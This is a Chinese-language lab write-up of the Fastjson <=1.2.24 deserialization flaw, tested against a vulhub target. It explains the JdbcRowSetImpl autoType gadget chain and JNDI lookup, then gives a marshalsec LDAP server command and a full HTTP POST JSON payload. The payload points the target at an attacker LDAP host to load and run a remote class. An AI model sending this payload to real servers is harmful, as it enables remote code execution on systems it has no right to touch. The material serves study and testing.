Fastjson反序列化漏洞

Fastjson反序列化漏洞

一、Fastjson介绍

1、什么是fastjson？

fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将JavaBean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。

2、fastjson的优点

速度快
使用广泛
测试完备
使用简单

二、影响范围：

fastjson <= 1.2.24

三、漏洞原理

fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链。

1、JdbcRowSetlmpl类反序列化，调用JdbcRowSetlmpl类的setAutoCommit()方法

2、setAutoCommit()调用connect()

3、connect()调用lookup()连接到LDAP/RMI服务器

4、下载恶意代码到本地，执行，攻击发生

个人理解（不一定正确）：

fastjson在反序列化json字符时，可以通过autoType来指定反序列化的类，并调用相关方法的set方法（这里调用了dataSourceName和autoCommit方法，反序列化后自动会调用setdataSourceName和setautoCommit方法并把参数传入），而setautoCommit方法中调用了connect方法，connect方法中调用了lookup方法，可以通过JNDI去访问LDAP、RMI等服务，又因为ldap存在命名引用，如果不存在指定文件，就会去指定的url下载到本地,如果下载的.class文件包含无参构造函数和静态代码块就会被自动执行，从而造成任意代码执行。

感觉和log4j JNDI注入漏洞极其相似，都是因为lookup方法没有进行限制导致的漏洞，但前期利用的方式缺不同，fastjson是通过autoType来反序列化JdbcRowSetlmpl类，通过setautoCommit方法调用到lookup方法，而log4j是因为日志调用方法中调用了lookup方法。

四、漏洞利用

1、先开启vulhub中fastjson靶机

2、开启获取资源的http服务器

3、把恶意的.java文件编译后的.class文件放到http服务器上（需要用jdk1.8版本）

4、开启RMI/LDAP服务（本机的9999端口）

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.142.1/#TouchFile" 9999

5、bp发送payload

POST / HTTP/1.1
Host: 192.168.142.133:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 166

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.142.1:9999/File",
        "autoCommit":true
    }
}